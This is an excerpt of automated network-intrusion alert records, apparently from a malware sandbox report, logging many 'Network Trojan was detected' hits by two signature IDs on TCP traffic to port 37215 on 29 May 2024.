                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.437224
                SID:2829579
                Source Port:46636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938838
                SID:2835222
                Source Port:57002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168772
                SID:2835222
                Source Port:56008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210867
                SID:2829579
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070245
                SID:2829579
                Source Port:39246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767759
                SID:2829579
                Source Port:38836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515572
                SID:2835222
                Source Port:53474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264589
                SID:2829579
                Source Port:33846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736983
                SID:2835222
                Source Port:33798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910959
                SID:2829579
                Source Port:47814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588162
                SID:2835222
                Source Port:53946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967223
                SID:2829579
                Source Port:36518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716112
                SID:2829579
                Source Port:36206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381704
                SID:2829579
                Source Port:58974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132972
                SID:2835222
                Source Port:46676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511040
                SID:2829579
                Source Port:33630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882995
                SID:2829579
                Source Port:38876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264813
                SID:2829579
                Source Port:55206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628780
                SID:2829579
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320011
                SID:2829579
                Source Port:52532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470046
                SID:2835222
                Source Port:35924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236411
                SID:2829579
                Source Port:33712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442706
                SID:2829579
                Source Port:39466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936411
                SID:2829579
                Source Port:46836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435824
                SID:2835222
                Source Port:46684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885479
                SID:2829579
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231080
                SID:2829579
                Source Port:39314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942572
                SID:2835222
                Source Port:54586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237565
                SID:2835222
                Source Port:52856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361665
                SID:2829579
                Source Port:53572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716192
                SID:2835222
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282085
                SID:2835222
                Source Port:48482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957589
                SID:2829579
                Source Port:58682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665214
                SID:2835222
                Source Port:54354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438642
                SID:2829579
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414953
                SID:2835222
                Source Port:38880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869476
                SID:2835222
                Source Port:51350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945799
                SID:2829579
                Source Port:59388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561101
                SID:2835222
                Source Port:57564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519824
                SID:2829579
                Source Port:39722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184530
                SID:2835222
                Source Port:50712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266909
                SID:2829579
                Source Port:40636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326081
                SID:2829579
                Source Port:39428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964179
                SID:2835222
                Source Port:33630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589386
                SID:2829579
                Source Port:52482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523961
                SID:2835222
                Source Port:49378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022594
                SID:2829579
                Source Port:53028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144933
                SID:2835222
                Source Port:60082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113017
                SID:2835222
                Source Port:48268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966530
                SID:2829579
                Source Port:46826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128650
                SID:2835222
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264795
                SID:2835222
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022915
                SID:2829579
                Source Port:46804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091817
                SID:2835222
                Source Port:52532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984902
                SID:2835222
                Source Port:45274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226617
                SID:2835222
                Source Port:33968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972182
                SID:2835222
                Source Port:53054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771026
                SID:2829579
                Source Port:36672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902100
                SID:2829579
                Source Port:39080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008532
                SID:2829579
                Source Port:52056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672563
                SID:2835222
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233658
                SID:2829579
                Source Port:48632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559656
                SID:2829579
                Source Port:60178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133591
                SID:2835222
                Source Port:53208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418039
                SID:2835222
                Source Port:39858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263800
                SID:2835222
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502058
                SID:2829579
                Source Port:55088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559293
                SID:2829579
                Source Port:56646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509695
                SID:2835222
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712659
                SID:2835222
                Source Port:40088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506904
                SID:2835222
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227371
                SID:2835222
                Source Port:50698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035058
                SID:2835222
                Source Port:32810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570676
                SID:2829579
                Source Port:42612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913720
                SID:2829579
                Source Port:52484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279276
                SID:2835222
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176705
                SID:2829579
                Source Port:42390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170171
                SID:2829579
                Source Port:33694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282634
                SID:2829579
                Source Port:56302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813070
                SID:2835222
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559237
                SID:2835222
                Source Port:34910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941389
                SID:2835222
                Source Port:48250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997868
                SID:2829579
                Source Port:33286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977907
                SID:2835222
                Source Port:52832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845771
                SID:2835222
                Source Port:43394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422072
                SID:2829579
                Source Port:58400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830937
                SID:2835222
                Source Port:36482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903591
                SID:2829579
                Source Port:45020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773659
                SID:2835222
                Source Port:53346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154446
                SID:2829579
                Source Port:47396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651771
                SID:2835222
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977185
                SID:2829579
                Source Port:58934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663398
                SID:2835222
                Source Port:35282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517740
                SID:2829579
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515727
                SID:2835222
                Source Port:59044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884121
                SID:2835222
                Source Port:52336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763233
                SID:2829579
                Source Port:36082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855984
                SID:2829579
                Source Port:38546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900312
                SID:2829579
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582869
                SID:2835222
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916829
                SID:2829579
                Source Port:47410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369664
                SID:2829579
                Source Port:37064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227768
                SID:2829579
                Source Port:53006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653106
                SID:2835222
                Source Port:40168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845415
                SID:2829579
                Source Port:51904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223918
                SID:2835222
                Source Port:60780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565140
                SID:2835222
                Source Port:51510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572095
                SID:2835222
                Source Port:57856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630099
                SID:2835222
                Source Port:38584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732844
                SID:2829579
                Source Port:56256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282912
                SID:2829579
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609731
                SID:2829579
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100369
                SID:2829579
                Source Port:33852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955438
                SID:2835222
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597842
                SID:2835222
                Source Port:45556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786723
                SID:2829579
                Source Port:55328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434852
                SID:2829579
                Source Port:56198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617773
                SID:2835222
                Source Port:35732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977604
                SID:2829579
                Source Port:58642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968677
                SID:2835222
                Source Port:56526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763861
                SID:2835222
                Source Port:35832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908906
                SID:2835222
                Source Port:51030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712331
                SID:2829579
                Source Port:44936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507030
                SID:2829579
                Source Port:53766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800866
                SID:2835222
                Source Port:41696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840380
                SID:2829579
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215605
                SID:2835222
                Source Port:38556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520153
                SID:2829579
                Source Port:48514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711523
                SID:2835222
                Source Port:56532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.041948
                SID:2829579
                Source Port:43486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854144
                SID:2829579
                Source Port:36110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563198
                SID:2835222
                Source Port:57056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718382
                SID:2829579
                Source Port:60914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536695
                SID:2829579
                Source Port:48144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441549
                SID:2829579
                Source Port:39786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334671
                SID:2835222
                Source Port:60406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793657
                SID:2835222
                Source Port:47290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536696
                SID:2829579
                Source Port:44912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282237
                SID:2835222
                Source Port:49102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335190
                SID:2829579
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665168
                SID:2835222
                Source Port:53900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956233
                SID:2835222
                Source Port:36924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180286
                SID:2835222
                Source Port:39352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617555
                SID:2835222
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586237
                SID:2829579
                Source Port:47228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826361
                SID:2829579
                Source Port:37030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225312
                SID:2829579
                Source Port:44748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721590
                SID:2829579
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.038168
                SID:2835222
                Source Port:52472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175536
                SID:2829579
                Source Port:41962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886206
                SID:2835222
                Source Port:49572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466206
                SID:2835222
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912900
                SID:2835222
                Source Port:47020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946859
                SID:2835222
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817119
                SID:2829579
                Source Port:35612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687190
                SID:2835222
                Source Port:33898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446300
                SID:2829579
                Source Port:58122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665525
                SID:2835222
                Source Port:45206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.970039
                SID:2829579
                Source Port:59160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847090
                SID:2829579
                Source Port:41054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764061
                SID:2829579
                Source Port:42682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375256
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740168
                SID:2829579
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950071
                SID:2835222
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417617
                SID:2829579
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271132
                SID:2829579
                Source Port:45202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798656
                SID:2829579
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517284
                SID:2829579
                Source Port:40480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881482
                SID:2829579
                Source Port:56370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900985
                SID:2835222
                Source Port:41642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359705
                SID:2829579
                Source Port:41584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617691
                SID:2829579
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901959
                SID:2835222
                Source Port:33682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165877
                SID:2829579
                Source Port:33268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959245
                SID:2829579
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943921
                SID:2835222
                Source Port:60156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463557
                SID:2835222
                Source Port:59046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324940
                SID:2829579
                Source Port:41832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531090
                SID:2835222
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420065
                SID:2835222
                Source Port:53882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786799
                SID:2829579
                Source Port:45394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997742
                SID:2835222
                Source Port:39426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852651
                SID:2829579
                Source Port:37766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209634
                SID:2835222
                Source Port:55572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374325
                SID:2835222
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795877
                SID:2835222
                Source Port:36336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836023
                SID:2835222
                Source Port:41610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015362
                SID:2835222
                Source Port:48880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547465
                SID:2835222
                Source Port:37432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766370
                SID:2835222
                Source Port:49338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532261
                SID:2829579
                Source Port:34876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883858
                SID:2835222
                Source Port:60850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584177
                SID:2835222
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745292
                SID:2829579
                Source Port:45866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848961
                SID:2835222
                Source Port:52442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711926
                SID:2829579
                Source Port:49662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513072
                SID:2835222
                Source Port:52990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
